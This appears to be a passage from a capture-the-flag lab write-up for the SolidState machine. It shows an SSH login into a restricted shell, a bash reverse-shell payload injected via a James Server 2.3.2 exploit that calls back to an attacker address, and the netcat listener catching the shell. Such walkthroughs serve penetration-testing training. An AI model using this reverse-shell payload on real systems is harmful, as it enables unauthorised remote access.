$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
We have a restricted shell and cannot do anything but we can put a different payload in the James Server 2.3.2 exploit to run after a user logins (mindy ssh works for us)
payload = '/bin/bash -i >& /dev/tcp/10.10.16.161/6969 0>&1'
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.51] 52852
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami;id
mindy
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)